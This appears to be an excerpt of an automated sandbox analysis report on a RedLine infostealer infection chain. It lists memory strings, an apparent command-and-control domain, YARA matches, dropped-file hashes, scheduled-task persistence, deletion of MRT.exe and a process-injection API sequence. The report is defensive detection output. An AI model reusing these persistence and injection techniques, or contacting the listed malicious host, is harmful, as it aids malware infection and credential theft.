Source: skotes.exe, 00000004.00000003.82488334225.0000000005C00000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000004.00000003.80808222885.0000000005C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: skotes.exe, 00000004.00000003.82488334225.0000000005C00000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000004.00000003.80808222885.0000000005C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: lsass.exe, 00000039.00000000.79033075547.0000026AB4E70000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79033133066.0000026AB4E85000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0H
Source: skotes.exe, 00000004.00000003.82488334225.0000000005C00000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000004.00000003.80808222885.0000000005C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000005.00000002.78890136074.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.78890136074.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png4
Source: lsass.exe, 00000039.00000003.80803076589.0000026AB563D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.microsof
Source: powershell.exe, 00000005.00000002.78890136074.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: lsass.exe, 00000039.00000003.79836697947.0000026AB5641000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79032946445.0000026AB4E2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000039.00000003.83540853279.0000026AB564E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79032946445.0000026AB4E2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000005.00000002.78890136074.0000000004991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.78900734979.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.79018998430.0000000004B01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000039.00000000.79032946445.0000026AB4E2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79033006802.0000026AB4E4F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: powershell.exe, 00000005.00000002.78890136074.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79032946445.0000026AB4E2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000039.00000000.79032946445.0000026AB4E2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000039.00000000.79032946445.0000026AB4E2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: lsass.exe, 00000039.00000000.79032946445.0000026AB4E2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
Source: powershell.exe, 00000005.00000002.78890136074.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.78890136074.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
Source: skotes.exe, 00000004.00000003.82488334225.0000000005C00000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000004.00000003.80808222885.0000000005C00000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79033075547.0000026AB4E70000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79033133066.0000026AB4E85000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000005.00000002.78887216593.0000000000953000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.78896959602.0000000000A33000.00000004.00000020.00020000.00000000.sdmp, Ryu8yUx.exe, 0000000D.00000002.79066038176.000000000154E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.79027390881.00000000071C0000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79034005111.0000026AB565E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000005.00000002.78890136074.0000000004991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.78900734979.0000000004C19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.78900734979.0000000004C28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.79018998430.0000000004B47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.79018998430.0000000004B38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000005.00000002.78893751401.0000000005F20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.78893751401.0000000005F20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.78893751401.0000000005F20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000005.00000002.78890136074.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.78890136074.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester4
Source: Ryu8yUx.exe, 0000000D.00000002.79069418774.0000000004046000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://modernakdventure.cyou/
Source: Ryu8yUx.exe, 0000000D.00000002.79069418774.0000000004046000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://modernakdventure.cyou/_
Source: Ryu8yUx.exe, 0000000D.00000002.79069308485.0000000004040000.00000004.00000800.00020000.00000000.sdmp, Ryu8yUx.exe, 0000000D.00000002.79066963195.00000000015E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://modernakdventure.cyou/api
Source: Ryu8yUx.exe, 0000000D.00000002.79069308485.0000000004040000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://modernakdventure.cyou/apiurj
Source: Ryu8yUx.exe, 0000000D.00000002.79069418774.0000000004046000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://modernakdventure.cyou/u
Source: powershell.exe, 00000005.00000002.78893751401.0000000005F20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000005.00000002.78887216593.0000000000953000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.78896959602.0000000000A33000.00000004.00000020.00020000.00000000.sdmp, Ryu8yUx.exe, 0000000D.00000002.79066038176.000000000154E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.79027390881.00000000071C0000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79034005111.0000026AB565E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0

Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe

Code function: 13_2_00439020 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

13_2_00439020

Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe

Code function: 13_2_00439020 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

13_2_00439020

Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe

Code function: 13_2_004391E0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

13_2_004391E0

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_5080.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 61.2.ViGgA8C.exe.f20000.0.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 61.2.ViGgA8C.exe.f20000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 61.2.ViGgA8C.exe.f20000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0000003D.00000003.79070089758.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0000003D.00000002.79562208043.0000000000F22000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: powershell.exe PID: 5080, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Found suspicious ZIP file

Source: payload.zip.5.dr

Zip Entry: bs.bat

PE file contains section with special chars

Source: Mc3FDUMnVz.exe	Static PE information: section name:
Source: Mc3FDUMnVz.exe	Static PE information: section name: .idata
Source: Mc3FDUMnVz.exe	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: random[1].exe.4.dr	Static PE information: section name:
Source: random[1].exe.4.dr	Static PE information: section name: .idata
Source: 439c2c3c87.exe.4.dr	Static PE information: section name:
Source: 439c2c3c87.exe.4.dr	Static PE information: section name: .idata
Source: UN8QxIq[1].exe.4.dr	Static PE information: section name:
Source: UN8QxIq[1].exe.4.dr	Static PE information: section name: .idata
Source: UN8QxIq[1].exe.4.dr	Static PE information: section name:
Source: UN8QxIq.exe.4.dr	Static PE information: section name:
Source: UN8QxIq.exe.4.dr	Static PE information: section name: .idata
Source: UN8QxIq.exe.4.dr	Static PE information: section name:
Source: ViGgA8C[1].exe.4.dr	Static PE information: section name:
Source: ViGgA8C[1].exe.4.dr	Static PE information: section name: .idata
Source: ViGgA8C[1].exe.4.dr	Static PE information: section name:
Source: ViGgA8C.exe.4.dr	Static PE information: section name:
Source: ViGgA8C.exe.4.dr	Static PE information: section name: .idata
Source: ViGgA8C.exe.4.dr	Static PE information: section name:
Source: random[1].exe1.4.dr	Static PE information: section name:
Source: random[1].exe1.4.dr	Static PE information: section name: .idata
Source: random[1].exe1.4.dr	Static PE information: section name:
Source: 23a60cad74.exe.4.dr	Static PE information: section name:
Source: 23a60cad74.exe.4.dr	Static PE information: section name: .idata
Source: 23a60cad74.exe.4.dr	Static PE information: section name:
Source: covxzxzipzly.exe.17.dr	Static PE information: section name:
Source: covxzxzipzly.exe.17.dr	Static PE information: section name: .idata
Source: covxzxzipzly.exe.17.dr	Static PE information: section name:
Source: tmp7BA6.tmp.61.dr	Static PE information: section name:
Source: tmp7BA6.tmp.61.dr	Static PE information: section name: .idata
Source: tmp7BA6.tmp.61.dr	Static PE information: section name:

Uses powercfg.exe to modify the power settings

Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe

Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Process Stats: CPU usage > 6%

Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000028559F22244 GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread,	14_2_0000028559F22244
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000028559F2253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,	14_2_0000028559F2253C
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000028559F2202C NtQuerySystemInformation,StrCmpNIW,	14_2_0000028559F2202C
Source: C:\Windows\System32\dialer.exe	Code function: 47_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,	47_2_00000001400010C0

Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	File created: C:\Windows\Tasks\skotes.job	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\System32\Tasks\F6AXAma0V3l
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\System32\Tasks\AYDt7maKkma
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\System32\Tasks\w6IsPma2wMO
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\System32\Tasks\svchoost.exe
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\System32\Tasks\2s1E7maxTOK
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\System32\Tasks\dYTrZmaPzYS
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\System32\Tasks\nvdZYmascmw
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\System32\Tasks\FZ9Edma36hm
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\System32\Tasks\DDBZHma4mw4

Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe

File deleted: C:\Windows\System32\MRT.exe

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_046CB9A0	5_2_046CB9A0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 12_2_02A01EF0	12_2_02A01EF0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 12_2_02A06668	12_2_02A06668
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 12_2_02A01BEF	12_2_02A01BEF
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 12_2_02A01C00	12_2_02A01C00
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0042C0C0	13_2_0042C0C0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_004380CD	13_2_004380CD
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_004258B0	13_2_004258B0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0043E150	13_2_0043E150
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00412159	13_2_00412159
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_004321AB	13_2_004321AB
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0040BA60	13_2_0040BA60
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00419A00	13_2_00419A00
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00446220	13_2_00446220
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00441310	13_2_00441310
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_004293EE	13_2_004293EE
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0043DE00	13_2_0043DE00
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0041DEF0	13_2_0041DEF0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_004456F0	13_2_004456F0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_004436B9	13_2_004436B9
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00401040	13_2_00401040
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00410845	13_2_00410845
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00410050	13_2_00410050
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0040E830	13_2_0040E830
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00412830	13_2_00412830
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0042D831	13_2_0042D831
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0043B8D2	13_2_0043B8D2
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_004378E7	13_2_004378E7
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_004220F0	13_2_004220F0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_004278B4	13_2_004278B4
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0041A8BA	13_2_0041A8BA
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0043C0BF	13_2_0043C0BF
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00426150	13_2_00426150
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00436960	13_2_00436960
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00429970	13_2_00429970
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0042B175	13_2_0042B175
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0041F100	13_2_0041F100
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0040C920	13_2_0040C920
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00433930	13_2_00433930
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0040B980	13_2_0040B980
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00408A40	13_2_00408A40
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0040A240	13_2_0040A240
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0042026A	13_2_0042026A
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_004452C0	13_2_004452C0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00402AD0	13_2_00402AD0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_004152F4	13_2_004152F4
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00435A86	13_2_00435A86
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00415A8F	13_2_00415A8F
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00432A8D	13_2_00432A8D
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00421A90	13_2_00421A90
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00423AB0	13_2_00423AB0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00420AB0	13_2_00420AB0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0043DAB0	13_2_0043DAB0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0043EB40	13_2_0043EB40
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00421350	13_2_00421350
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00438B00	13_2_00438B00
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00445B00	13_2_00445B00
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00432B2C	13_2_00432B2C
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0040E380	13_2_0040E380
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00412B90	13_2_00412B90
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00441BA0	13_2_00441BA0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00444C40	13_2_00444C40
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00409460	13_2_00409460
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00418C20	13_2_00418C20
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0040C4C0	13_2_0040C4C0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0042C4D0	13_2_0042C4D0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_004424D0	13_2_004424D0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_004324E1	13_2_004324E1
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_004034F0	13_2_004034F0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0042C4F0	13_2_0042C4F0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0041BCF6	13_2_0041BCF6
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0042B4B0	13_2_0042B4B0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0040B540	13_2_0040B540
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0042ED44	13_2_0042ED44
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00444D50	13_2_00444D50
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00444D69	13_2_00444D69
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0043D570	13_2_0043D570
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0041B500	13_2_0041B500
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00407D20	13_2_00407D20
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00442D3C	13_2_00442D3C
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0042E53D	13_2_0042E53D
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_004385C7	13_2_004385C7
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_004205BB	13_2_004205BB
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0043F64E	13_2_0043F64E
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00426650	13_2_00426650
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00444C40	13_2_00444C40
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0041FE58	13_2_0041FE58
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00415E70	13_2_00415E70
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00445E70	13_2_00445E70
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00444E70	13_2_00444E70
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00444625	13_2_00444625
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0043CE21	13_2_0043CE21
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0043EE20	13_2_0043EE20
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00421680	13_2_00421680
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00403E90	13_2_00403E90
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00421EA0	13_2_00421EA0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00434EAB	13_2_00434EAB
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00408EB0	13_2_00408EB0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0042DF66	13_2_0042DF66
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0041A766	13_2_0041A766
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00404772	13_2_00404772
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00444F20	13_2_00444F20
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0043D7D0	13_2_0043D7D0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0041AFF7	13_2_0041AFF7
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0041BF8A	13_2_0041BF8A
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00424F90	13_2_00424F90
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00444FB0	13_2_00444FB0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00429FBD	13_2_00429FBD
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000028559EF1F2C	14_2_0000028559EF1F2C
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000028559EFD0E0	14_2_0000028559EFD0E0
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000028559F038A8	14_2_0000028559F038A8
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000028559F22B2C	14_2_0000028559F22B2C
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000028559F2DCE0	14_2_0000028559F2DCE0
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000028559F344A8	14_2_0000028559F344A8
Source: C:\Windows\System32\dialer.exe	Code function: 47_2_000000014000226C	47_2_000000014000226C
Source: C:\Windows\System32\dialer.exe	Code function: 47_2_00000001400014D8	47_2_00000001400014D8
Source: C:\Windows\System32\dialer.exe	Code function: 47_2_0000000140002560	47_2_0000000140002560

Source: Joe Sandbox View	Dropped File: C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe CE8E8C66E7E227583D1B5FC337B0ABA4EB9DEF76B5957CA4602F06D896C859DC
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\UN8QxIq[1].exe CE8E8C66E7E227583D1B5FC337B0ABA4EB9DEF76B5957CA4602F06D896C859DC
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\Ryu8yUx[1].exe 991515CEFB9B7C2112EAC6558F98E2EC5892F01AA93E49218F6D9C1C7FC28022

Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: String function: 00418C10 appears 87 times
